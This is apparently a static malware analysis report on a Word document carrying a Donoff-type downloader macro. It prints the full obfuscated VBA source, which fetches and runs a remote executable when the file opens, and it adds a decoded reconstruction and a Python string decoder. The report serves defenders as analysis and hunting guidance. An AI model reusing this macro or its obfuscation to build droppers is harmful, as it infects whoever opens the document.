Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2d59daf9e330e817…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 71.5 KB
Created: 2016-05-17 22:02:00
Authoring application: Microsoft Office Word
First seen: 2017-12-09
MD5: 646f6583c2b65265cd8c26a1c2c49047
SHA-1: ae507287f023f950efd5d72bbc44b99a94475afe
SHA-256: 2d59daf9e330e817a297c2a063103aa719aa8a20efd7cdb60dce2bf3077a3727
Risk score: 310

Malware Insights

MITRE ATT&CK
  • T1059 Command and Scripting Interpreter
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample is a Word document (OLE2 container) whose VBA project runs a downloader from the Document_Open handler (ThisDocument.Document_Open calls ZDBNJCT.uahKxRznq, which calls ZDBNJCT.YFZGFp). Nothing of interest appears as a plain literal: every COM method name, the HTTP header, the download URL and the drop path are stored with junk characters interleaved and are recovered at runtime by UEKUYyuL.TTOtgzhRy, which keeps only those characters of its first argument that do not occur in its second. Every COM call then goes through the CallByName wrappers in module wHCMPuY (call type 1 = VbMethod, 2 = VbGet, 4 = VbLet), so no method name exists as a string until the moment it is invoked. Applying the filter to the literals in module ZDBNJCT yields the following sequence:

  • CreateObject("MSXML2.ServerXMLHTTP.6.0"), then Open "GET" hxxp://hk-kitsuki[.]com/system/cache/update.exe (synchronous), SetRequestHeader "User-Agent", "Mozilla/4.0 (compatible;)", Send.
  • CreateObject("ADODB.Stream"), Type = 1 (binary), Open, Write the ResponseBody, SaveToFile to %TEMP%/c45aabcc350a.exe with save option 2 (create or overwrite), Close. TEMP is resolved through WScript.Shell.Environment("PROCESS").
  • CreateObject("WScript.Shell").Exec on that path, which starts the downloaded binary.

YFZGFp wraps the whole sequence in On Error GoTo with an empty handler, so a failed download or a blocked file write produces no visible error in Word. The document carries no second-stage payload of its own; its only purpose is to fetch and run the remote executable, which matches the ClamAV Donoff (generic Office downloader) classification. The URL is shown defanged; it, the drop filename and the User-Agent string are indicators decoded from the macro, not evidence that the host was live when the sample was collected. For hunting, the useful signal is WINWORD.EXE issuing an outbound HTTP GET with that User-Agent (ServerXMLHTTP is built on WinHTTP and does not follow the user's Internet Explorer proxy settings), followed by a new .exe written to %TEMP% and launched with Word as its parent process.

Heuristics 9

  • ClamAV: Doc.Dropper.Donoff-5743530-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Donoff-5743530-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Public Function iYGruGhgWm() As Object
    Set iYGruGhgWm = CreateObject("WScript.Shell")
    End Function
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Public Function jHWFplmh() As Object
    Set icSBEYxalI = CreateObject("MSXML2.ServerXMLHTTP.6.0")
    Set jHWFplmh = icSBEYxalI
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    Public Sub TbjoWgmC(ByVal OPKCDm As Object, ByVal iPjUlAJKt As String)
    CallByName OPKCDm, iPjUlAJKt, 1
    End Sub
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) and cache streams contain an auto-execution token together with shell, download or object-execution tokens. This rule exists to catch p-code-only documents, or documents whose source extraction fails, where no readable source is available; it also survives "VBA stomping", where the source stream is overwritten but the compiled code still runs. For this sample the source did extract cleanly (see macros.bas below), so the finding corroborates the source-level detections above rather than standing alone.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Private Sub Document_Open()
    ZDBNJCT.uahKxRznq
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label shows which channel (macro, JS, link annotation, document body, ...) reached it. All seven hits below are XML namespace and schema identifiers from the document's Office and XMP metadata, found in the OLE body text, and are not network indicators. The macro's actual download URL is stored obfuscated (see Malware Insights) and is therefore not recovered by plain URL extraction.
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography (in document text, OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml (in document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5493 bytes
SHA-256: 3243f5a62fe400286580ebdd9112387e0a30968b4136297f49a364cfc6f7bcfb
Preview script
First 1,000 lines of the extracted script (the extracted source is well under that, so it is shown in full)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
ZDBNJCT.uahKxRznq
End Sub

Attribute VB_Name = "IqsEvVbZxP"
Public Function RDEFp(ByVal LaRBS As String, ByVal rRwluV As String) As String
RDEFp = LaRBS & rRwluV
End Function
Public Function SeHohPU(ByVal txztW As String, ByVal nNaoIseJGp As String) As Boolean
SeHohPU = InStr(1, txztW, nNaoIseJGp)
End Function
Public Function zAcxRvafyG(ByVal txztW As String) As Integer
zAcxRvafyG = Len(txztW)
End Function
Public Function fTkmoHQuSF(ByVal txztW As String, ByVal LZjbxfhur As Integer) As String
fTkmoHQuSF = Mid(txztW, LZjbxfhur, 1)
End Function

Attribute VB_Name = "UEKUYyuL"
Public Function TTOtgzhRy(ByVal cajXXile As String, ByVal ZEGWP As String) As String
Dim auQmA As Boolean
For LZjbxfhur = 1 To IqsEvVbZxP.zAcxRvafyG(cajXXile)
auQmA = IqsEvVbZxP.SeHohPU(ZEGWP, IqsEvVbZxP.fTkmoHQuSF(cajXXile, LZjbxfhur))
If Not auQmA Then
TTOtgzhRy = IqsEvVbZxP.RDEFp(TTOtgzhRy, IqsEvVbZxP.fTkmoHQuSF(cajXXile, LZjbxfhur))
End If
Next
End Function

Attribute VB_Name = "wHCMPuY"
Public Sub TbjoWgmC(ByVal OPKCDm As Object, ByVal iPjUlAJKt As String)
CallByName OPKCDm, iPjUlAJKt, 1
End Sub
Public Function jHWFplmh() As Object
Set icSBEYxalI = CreateObject("MSXML2.ServerXMLHTTP.6.0")
Set jHWFplmh = icSBEYxalI
End Function
Public Function ioYcH(ByVal OPKCDm As Object, ByVal iPjUlAJKt As String, ByVal yYuUhED As String) As Variant
Set ioYcH = CallByName(OPKCDm, iPjUlAJKt, 2, yYuUhED)
End Function
Public Function iYGruGhgWm() As Object
Set iYGruGhgWm = CreateObject("WScript.Shell")
End Function
Public Function bZdCWPoG(ByVal OPKCDm As Object, ByVal xjlhPu As String) As Variant
bZdCWPoG = CallByName(OPKCDm, xjlhPu, 2)
End Function
Public Sub VcaMM(ByVal OPKCDm As Object, ByVal iPjUlAJKt As String, ByVal JnNsHEEoG As Variant, ByVal PLuoIcOy As Variant)
CallByName OPKCDm, iPjUlAJKt, 1, JnNsHEEoG, PLuoIcOy
End Sub
Public Sub RctPwECJyK(ByVal OPKCDm As Object, ByVal xjlhPu As String, ByVal GLzaGe As Variant)
CallByName OPKCDm, xjlhPu, 4, GLzaGe
End Sub
Public Sub GDFKTBbEIT(ByVal OPKCDm As Object, ByVal iPjUlAJKt As String, ByVal JnNsHEEoG As Variant, ByVal PLuoIcOy As Variant, ByVal YjNtZXXbY As Variant)
CallByName OPKCDm, iPjUlAJKt, 1, JnNsHEEoG, PLuoIcOy, YjNtZXXbY
End Sub
Public Sub EZoIPSKoR(ByVal OPKCDm As Object, ByVal iPjUlAJKt As String, ByVal yYuUhED As Variant)
CallByName OPKCDm, iPjUlAJKt, 1, yYuUhED
End Sub
Public Function dICxPnkVcU() As Object
Set dICxPnkVcU = CreateObject("ADODB.Stream")
End Function

Attribute VB_Name = "ZDBNJCT"
Private Function JklKxwR() As String
JklKxwR = UEKUYyuL.TTOtgzhRy("CDlDoDKseK", "OKD")
End Function
Private Sub JuDJpZye(ByVal RIuQMsrDev As String, ByVal tQglOjEMNO As String)
Set RkwKHCbsZ = wHCMPuY.jHWFplmh
wHCMPuY.GDFKTBbEIT RkwKHCbsZ, LdfciyuNu, HevniUQ, RIuQMsrDev, False
wHCMPuY.VcaMM RkwKHCbsZ, rbeRXmUU, UEKUYyuL.TTOtgzhRy("2UhszejrB-Ahg2e2jnt2", "2hBjz"), UEKUYyuL.TTOtgzhRy("M3onnz3ilnlVaV3/n4V.30 V(3cVoVm33p3atninbnVl3e;V)3", "3nV")
wHCMPuY.TbjoWgmC RkwKHCbsZ, UEKUYyuL.TTOtgzhRy("TSe4n4Jd", "JTDy4U")
qdOiHiUy tQglOjEMNO, wHCMPuY.bZdCWPoG(RkwKHCbsZ, UEKUYyuL.TTOtgzhRy("kRecusUpuoUnus5eBcouduuy", "KkUc5u"))
End Sub
Private Function zQIbVmcK() As String
zQIbVmcK = UEKUYyuL.TTOtgzhRy("TB8E8MPG", "8BGu")
End Function
Private Sub qdOiHiUy(ByVal tQglOjEMNO As String, ByVal QnrkFzn As Variant)
Set HutpcnSz = wHCMPuY.dICxPnkVcU
wHCMPuY.RctPwECJyK HutpcnSz, UEKUYyuL.TTOtgzhRy("TqyOp9eO", "Oq9"), 1
wHCMPuY.TbjoWgmC HutpcnSz, UEKUYyuL.TTOtgzhRy("OAApeQnC", "AC9QL")
wHCMPuY.EZoIPSKoR HutpcnSz, UEKUYyuL.TTOtgzhRy("pWdrdiptpe", "pdxu4"), QnrkFzn
wHCMPuY.VcaMM HutpcnSz, UEKUYyuL.TTOtgzhRy("bS.avwueuTuoF.i.ulwe", "w.bu"), tQglOjEMNO, 2
wHCMPuY.TbjoWgmC HutpcnSz, JklKxwR
End Sub
Private Function DiZSxKj() As String
DiZSxKj = UEKUYyuL.TTOtgzhRy("hf5ttffp:Y5//5hfkY-YkYi55tfsufkYiY.55coYYm5/5sYysffteYmYY/YcYafcYhe5/5Yu5pYdYaftef.Yef5xef", "Y5f")
End Function
Private Function HevniUQ() As String
HevniUQ = UEKUYyuL.TTOtgzhRy("mGEmTs", "rFmsq")
End Function
Private Function ekeuY() As String
ekeuY = UEKUYyuL.TTOtgzhRy("9En9Avi  roA9n me nAt ", "9A ")
End Function
Private Function JoCJwPZQ(ByVal JFNmqAdA As String) As String
Set AMcdgJXVb = wHCMPuY.ioYcH(wHCMPuY.iYGruGhgWm, ekeuY, ExydJpsv)
JoCJwPZQ = AMcdgJXVb(JFNmqAdA)
End Function
Private Function lTsHPVqJU() As String
lTsHPVqJU = UEKUYyuL.TTOtgzhRy("/2c24HS5a1Hab1c22c3HS50SSa1.2exSSe", "H21S")
End Function
Public Sub uahKxRznq()
YFZGFp
End Sub
Private Function LdfciyuNu() As String
LdfciyuNu = UEKUYyuL.TTOtgzhRy("OAApeQnC", "AC9QL")
End Function
Private Function ExydJpsv() As String
ExydJpsv = UEKUYyuL.TTOtgzhRy("PZRlOibCZExSSo", "ixZbol")
End Function
Private Sub mVggWiBl(ByVal EHuEIJsaEI As String)
wHCMPuY.EZoIPSKoR wHCMPuY.iYGruGhgWm, UEKUYyuL.TTOtgzhRy("qExqegqc", "qBg"), EHuEIJsaEI
End Sub
Private Function rbeRXmUU() As String
rbeRXmUU = UEKUYyuL.TTOtgzhRy("S6Met66ReMqM6uMesMbtbHMeMadMeMbr", "M6b")
End Function
Private Sub YFZGFp()
On Error GoTo qVrIPck
JuDJpZye DiZSxKj, elCAWm
mVggWiBl elCAWm
Exit Sub
qVrIPck:
End Sub
Private Function elCAWm() As String
elCAWm = JoCJwPZQ(zQIbVmcK) & lTsHPVqJU
End Function
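To verify the behaviour summarised in Malware Insights without executing the macro, the following Python script re-implements the character-filter routine UEKUYyuL.TTOtgzhRy and decodes every literal used in module ZDBNJCT. This is an added example written for this report; it is not output of the analysis platform and not part of oletools. The (payload, junk) pairs are copied verbatim from the extracted source above; the descriptive keys in the ENCODED table, the regex helper for pulling pairs out of a raw olevba dump, and the defanging format are additions for this example and are not identifiers from the sample.

```python
"""Decoder for the string obfuscation used by this sample's VBA macro.

Added example for this report (not analysis-platform output, not oletools).
The (payload, junk) pairs below are copied verbatim from module ZDBNJCT of
the extracted macro; the dictionary keys are descriptive names chosen here.
"""
import re


def strip_junk(payload: str, junk: str) -> str:
    """Python equivalent of UEKUYyuL.TTOtgzhRy: keep only the characters of
    `payload` that do not occur in `junk`, in their original order.  VBA's
    InStr defaults to a binary (case-sensitive) compare, so a plain set
    lookup is an exact match for the macro's behaviour."""
    junk_set = set(junk)
    return "".join(ch for ch in payload if ch not in junk_set)


# Obfuscated literals from the macro, keyed by what the decoded value is used for.
ENCODED = {
    "url": ("hf5ttffp:Y5//5hfkY-YkYi55tfsufkYiY.55coYYm5/5sYysffteYmYY/YcYafcYhe5/5Yu5pYdYaftef.Yef5xef", "Y5f"),
    "http_method": ("mGEmTs", "rFmsq"),
    "open": ("OAApeQnC", "AC9QL"),
    "set_request_header": ("S6Met66ReMqM6uMesMbtbHMeMadMeMbr", "M6b"),
    "header_name": ("2UhszejrB-Ahg2e2jnt2", "2hBjz"),
    "header_value": ("M3onnz3ilnlVaV3/n4V.30 V(3cVoVm33p3atninbnVl3e;V)3", "3nV"),
    "send": ("TSe4n4Jd", "JTDy4U"),
    "response_body": ("kRecusUpuoUnus5eBcouduuy", "KkUc5u"),
    "stream_type": ("TqyOp9eO", "Oq9"),
    "write": ("pWdrdiptpe", "pdxu4"),
    "save_to_file": ("bS.avwueuTuoF.i.ulwe", "w.bu"),
    "close": ("CDlDoDKseK", "OKD"),
    "environment": ("9En9Avi  roA9n me nAt ", "9A "),
    "env_scope": ("PZRlOibCZExSSo", "ixZbol"),
    "env_var": ("TB8E8MPG", "8BGu"),
    "drop_name": ("/2c24HS5a1Hab1c22c3HS50SSa1.2exSSe", "H21S"),
    "exec": ("qExqegqc", "qBg"),
}


def decode_all(encoded=ENCODED) -> dict:
    """Decode every literal in one pass."""
    return {name: strip_junk(payload, junk) for name, (payload, junk) in encoded.items()}


def extract_pairs(vba_source: str) -> list:
    """Pull (payload, junk) pairs straight out of olevba output, so the decoder
    can be re-run on a raw dump instead of the hand-copied table above."""
    return re.findall(r'TTOtgzhRy\("([^"]*)",\s*"([^"]*)"\)', vba_source)


def defang(url: str) -> str:
    """hxxp://host[.]tld/... form for pasting into tickets and reports."""
    scheme, _, rest = url.partition("://")
    host, slash, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + "://" + host.replace(".", "[.]") + slash + path


def drop_path(decoded: dict) -> str:
    """WScript.Shell.Environment("PROCESS")("TEMP") & "/c45...exe", rendered
    with the variable left symbolic because it depends on the victim host."""
    return "%" + decoded["env_var"] + "%" + decoded["drop_name"]


def reconstruct(decoded: dict) -> list:
    """Render the CallByName dispatch in ZDBNJCT.YFZGFp as readable VBA-style
    lines.  The wHCMPuY wrappers pass CallType 1 = VbMethod, 2 = VbGet,
    4 = VbLet, which is how each line below was classified."""
    d = decoded
    path = drop_path(d)
    return [
        'Set http = CreateObject("MSXML2.ServerXMLHTTP.6.0")',
        f'http.{d["open"]} "{d["http_method"]}", "{d["url"]}", False',
        f'http.{d["set_request_header"]} "{d["header_name"]}", "{d["header_value"]}"',
        f'http.{d["send"]}',
        'Set stm = CreateObject("ADODB.Stream")',
        f'stm.{d["stream_type"]} = 1',                 # 1 = adTypeBinary
        f'stm.{d["open"]}',
        f'stm.{d["write"]} http.{d["response_body"]}',
        f'stm.{d["save_to_file"]} "{path}", 2',         # 2 = adSaveCreateOverWrite
        f'stm.{d["close"]}',
        f'CreateObject("WScript.Shell").{d["exec"]} "{path}"',
    ]


if __name__ == "__main__":
    decoded = decode_all()
    print("download URL (defanged):", defang(decoded["url"]))
    print("drop path:", drop_path(decoded))
    print("\nreconstructed macro:")
    for line in reconstruct(decoded):
        print("   ", line)
```

Run it as-is to print the decoded URL, drop path and the de-obfuscated call chain; point extract_pairs at a fresh olevba dump if a related sample uses the same filter routine with different literals. Because the decoder never touches COM or the network, it is safe to run on an analyst workstation, which is the point of reversing the string layer statically rather than detonating the document.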